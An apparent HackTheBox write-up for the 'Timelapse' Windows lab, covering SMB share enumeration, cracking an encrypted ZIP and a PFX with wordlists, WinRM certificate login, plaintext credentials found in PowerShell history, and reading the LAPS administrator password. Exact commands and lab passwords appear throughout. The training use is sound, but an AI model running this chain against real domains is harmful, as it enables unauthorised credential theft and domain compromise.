Security Stuff
  • About
  • HackTheBox
    • Windows
      • Forest
      • Escape
      • Timelapse
      • Support
    • Linux
      • TwoMillion
      • Soccer
      • Pollution
      • Pilgrimage
      • Sandworm
  • Windows
    • Authentication
      • Overview
      • Logon
      • Kerberos
      • Credential
    • Active Directory
      • Domain Service
        • LDAP
        • AD Objects
      • Key Distribution Center
      • Certificate Service
    • Windows Protocols
      • SMB
    • Windows Server
      • MSSQL
    • Execution
      • Windows APIs
      • Remote Access
        • WinRM
    • Credential Access
      • Kerberos Ticket
        • Kerberoasting Attack
        • Golden/Silver Ticket Attack
        • AS-REP Roasting Attack
      • OS Credential Dumping
        • DCsync Attack
      • Certified Pre-Owned
  • Linux
    • Management
      • Package
    • Process
      • Namespace
      • Terminal
  • Web
    • Authentication
      • SAML
      • OAuth
    • Enumeration
  • Defense
    • Windows
      • Windows Event Logs
  • Development
    • Programming Language
    • Database
      • MySQL
    • Virtualization
      • Container
    • Cryptography
      • GnuPG
Powered by GitBook
On this page
  • Overview
  • Reconnaissance
  • General Information
  • Port Scanning
  • LDAP
  • SMB
  • Initial Access
  • Crack ZIP encryption
  • Crack PKCS12
  • WinRM
  • Enumeration
  • Current User
  • Active Directory
  • LAPS
  • Privilege Escalation
  • Reference
  1. HackTheBox
  2. Windows

Timelapse

Overview

A Windows machine releases at 03/26/22 and features:

  • Active Directory

  • SMB Shares

  • LAPS

  • LDAP

  • Crack Encrypted ZIP and PKCS12

  • WinRM Certificate-based Authentication

  • PowerShell History

Reconnaissance

General Information

  • Host name dc01.timelapse.htb

  • Domain name timelapse.htb

  • WinRM over https got a expired TLS certificate

Port Scanning

  • TCP

    • Stealthy scanned

    • Opened ports 53, 88(Kerberos), 135, 139, 389, 5986(WinRM/HTTPs)...

    • Revealing this is a DC, Domain Controller

    • Domain timelapse.htb0

  • UDP, Top-500

    • 53, 123, 389

LDAP

  • Null bind test fails

$ ldapsearch -x -b 'dc=timelapse,dc=htb0'

SMB

  • Got some shares on target

    $ smbclient -U '' --no-pass -L //dc01.timelapse.htb
    
    		Sharename       Type      Comment
    		---------       ----      -------
    SMB1 disabled -- no workgroup available
    $ smbclient -U '' -L //dc01.timelapse.htb
    Enter WORKGROUP\'s password:
    
    		Sharename       Type      Comment
    		---------       ----      -------
    		ADMIN$          Disk      Remote Admin
    		C$              Disk      Default share
    		IPC$            IPC       Remote IPC
    		NETLOGON        Disk      Logon server share
    		Shares          Disk
    		SYSVOL          Disk      Logon server share
    SMB1 disabled -- no workgroup available
  • On the \\dc01.timelapse.htb\Shares found

    • folder HelpDesk containing LAPS related document

    • folder Dev contains a encrypted file winrm_backup.zip

    • SYSVOL and NETLOGON got access denied

Initial Access

Crack ZIP encryption

  • Use zip2john get the encrypted zip file hash

$ zip2john winrm_backup.zip > zip.hash
  • Crack the hash by john and get password supremelegacy

──╼ $sudo john -wordlist:/home/htb-jackx8x7x/Desktop/Useful\ Repos/SecLists/Passwords/Leaked-Databases/rockyou.txt zip.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-03-28 05:23) 2.857g/s 9924Kp/s 9924Kc/s 9924KC/s surfrox1391..supergau
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Crack PKCS12

  • Unzip the zip file get a file legacyy_dev_auth.pfx string legacyy@timelapse.htb

    • Which is protected by a passphrase

  • Crack by crackpkcs12

$sudo crackpkcs12 -d /home/htb-jackx8x7x/Desktop/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt ~/my_data/machine/timelapse/smb/legacyy_dev_auth.pfx

Dictionary attack - Starting 4 threads

*********************************************************
Dictionary attack - Thread 4 - Password found: thuglegacy
*********************************************************

WinRM

We can use this file authenticating with the target over WinRM

  • Extract the private key from the .pfx file

    $ openssl pkcs12 -in [yourfile.pfx] -nocerts -out [drlive.key]
    $ openssl pkcs12 -in [yourfile.pfx] -clcerts -nokeys -out [drlive.crt]
$ evil-winrm -c cert -k key -i <IP> -S

Enumeration

Current User

  • timelapse\legacyy

  • Privileges

    • SeMachineAccountPrivilege

    • SeIncreaseWorkingSetPrivilege

  • Groups

    • Remote Management Users

    • Pre-Windows 2000 Compatible Access

    • TIMELAPSE\Development

Active Directory

  • Compuer Accounts

    • DC01, DB01, WEB01, DEV01

    PS C:\> Get-ADComputer -Filter *
  • Users

    *Evil-WinRM* PS C:\Users\legacyy\Documents> get-aduser -filter *|select distinguishedname
    
    distinguishedname
    -----------------
    CN=Administrator,CN=Users,DC=timelapse,DC=htb
    CN=Guest,CN=Users,DC=timelapse,DC=htb
    CN=krbtgt,CN=Users,DC=timelapse,DC=htb
    CN=TheCyberGeek,OU=Admins,OU=Staff,DC=timelapse,DC=htb
    CN=Payl0ad,OU=Admins,OU=Staff,DC=timelapse,DC=htb
    CN=Legacyy,OU=Dev,OU=Staff,DC=timelapse,DC=htb
    CN=Sinfulz,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
    CN=Babywyrm,OU=HelpDesk,OU=Staff,DC=timelapse,DC=htb
    CN=svc_deploy,CN=Users,DC=timelapse,DC=htb
    CN=TRX,OU=Admins,OU=Staff,DC=timelapse,DC=htb

LAPS

  • Check for the LAPS password attribute ms-mcs-admpwd

PS C:\> Get-ADObject 'CN=ms-mcs-admpwd,CN=Schema,CN=Configuration,DC=timelapse,DC=htb'

Privilege Escalation

  • By list files recursive, found the PowerShell history

  • Alternatively, run the command Get-PSReadlineOption

    PS C:\> gci -recurse -file -force -erraction ignore | ?{<some filter>}
  • And we get the password for user svc_deploy

  • who is the member of the LAPS_Readers group

*Evil-WinRM* PS C:\Users\legacyy> get-content C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\Con*
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
  • We can read the local administrator password by

Evil-WinRM* PS C:\> get-adobject -filter 'objectclass -eq "computer"' -properties ms-mcs-admpwd


DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
ms-mcs-admpwd     : Me78u5,z{ml+N4VNl,rl)GxA
Name              : DC01
ObjectClass       : computer
ObjectGUID        : 6e10b102-6936-41aa-bb98-bed624c9b98f

Reference

PreviousEscapeNextSupport

Last updated 1 year ago

Configure Powershell WinRM to use OpenSSL generated Self-Signed certificate
Microsoft LAPS Security & Active Directory LAPS Configuration ReconActive Directory Security
AD EnumerationPentest Everything
Logo